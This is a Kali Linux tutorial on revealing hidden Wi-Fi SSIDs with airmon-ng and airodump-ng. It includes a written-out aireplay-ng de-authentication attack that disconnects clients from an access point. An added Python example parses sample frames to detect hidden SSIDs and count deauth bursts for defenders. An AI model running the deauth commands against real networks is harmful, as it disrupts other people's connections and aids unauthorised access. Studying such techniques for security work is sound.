>> Welcome, all, to this series on Kali Linux for Ethical Hacking. This is the second part, and we’ll look at some techniques for uncovering hidden SSIDs.
# Process
– Enabling Wireless Monitoring : airmon-ng
– Discovering the APs (Access Points) : airodump-ng
– Wait for a client association, or use de-authentication : aireplay-ng
# . . . Let’s Begin
– Before starting, make sure that eth0, lo and wlan0 are up (open a terminal and run ifconfig).
– Let’s start to monitor on that wireless interface, run:
airmon-ng start wlan0
– After executing the above command, we should get a new interface, mon0 (monitor mode enabled).
– Verify that both interfaces are up and running, run:
airmon-ng
– Look for wlan0 and mon0 in the output, then run:
airodump-ng mon0
– This monitors all the APs that Kali Linux can find.
– In the output, note the BSSID and ESSID columns. If there is a hidden SSID, its ESSID is shown as <length: 0>. [Note its CH (channel) and BSSID.]
– Press CTRL+C, then run:
airodump-ng -c 1 mon0
(Here, 1 is the channel we noted. Your value may differ.)
– After some time, you will notice that <length: 0> changes and reveals the SSID name.
– If it takes a lot of time to reveal the SSID, we can use the de-authentication process from a second terminal in Kali Linux.
– Copy the BSSID (MAC) of the AP on ch 1.
# Deauth Attack:
aireplay-ng -0 2 -a <BSSID> mon0
(Here, <BSSID> stands for the BSSID copied in the previous step.)
– This sends the de-auth to the broadcast address.
airodump-ng -c 1 mon0
– Wait
– Go over to the new terminal
aireplay-ng -0 2 -a <BSSID> mon0
– Finally, you will get the SSID in the ESSID column.
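
Why the steps above work, as an added example that is not part of the original post: a hidden network only blanks the SSID in its beacons, while probe responses and association requests still carry it in clear text, so hiding the SSID is not an access control. The Python code parses constructed frames (the MAC addresses and the name lab-net are made up) and also counts de-authentication frames, which is the signal a defender would alert on.

```python
BEACON, PROBE_RESP, ASSOC_REQ, DEAUTH = 8, 5, 0, 12     # management subtypes
FIXED_LEN = {BEACON: 12, PROBE_RESP: 12, ASSOC_REQ: 4}  # fixed fields before the tagged parameters

def ssid_element(ies):
    """Walk the tagged parameters and return the SSID element (tag 0), or None."""
    i = 0
    while i + 2 <= len(ies):
        tag, length = ies[i], ies[i + 1]
        value = ies[i + 2:i + 2 + length]
        if tag == 0:
            return value if len(value) == length else None  # None: truncated capture
        i += 2 + length
    return None

def parse_mgmt(frame):
    """Return (subtype, bssid, ssid) for a management frame with no radiotap header or FCS."""
    if len(frame) < 24 or (frame[0] >> 2) & 3 != 0:
        return None  # too short, or not a management frame
    subtype = frame[0] >> 4
    bssid = ":".join(f"{b:02X}" for b in frame[16:22])  # address 3
    fixed = FIXED_LEN.get(subtype)
    ssid = ssid_element(frame[24 + fixed:]) if fixed is not None else None
    return subtype, bssid, ssid

def is_hidden(ssid):
    """True for an empty SSID element (listed as <length: 0>) or one made only of null bytes."""
    return ssid is not None and (len(ssid) == 0 or set(ssid) == {0})

def survey(frames):
    """Per BSSID: was the SSID hidden in beacons, was it later seen in clear, deauth count."""
    seen = {}
    for subtype, bssid, ssid in filter(None, map(parse_mgmt, frames)):
        entry = seen.setdefault(bssid, {"hidden": False, "ssid": None, "deauth": 0})
        if subtype == DEAUTH:
            entry["deauth"] += 1  # a burst of these is the signal to alert on
        elif subtype == BEACON and is_hidden(ssid):
            entry["hidden"] = True
        elif ssid and not is_hidden(ssid):
            entry["ssid"] = ssid.decode("utf-8", "replace")
    return seen

# Constructed sample frames. Header tail: rest of frame control, duration,
# three addresses (the third is the BSSID), sequence control.
HDR_TAIL = bytes(3) + bytes.fromhex("021122334455" + "02AABBCCDDEE" * 2) + bytes(2)
SAMPLE = [
    bytes([0x80]) + HDR_TAIL + bytes(12) + b"\x00\x00\x01\x01\x82",  # beacon, SSID length 0
    bytes([0x50]) + HDR_TAIL + bytes(12) + b"\x00\x07lab-net",       # probe response with the name
    bytes([0xC0]) + HDR_TAIL + b"\x07\x00",                          # deauthentication, reason 7
]
print(survey(SAMPLE))
```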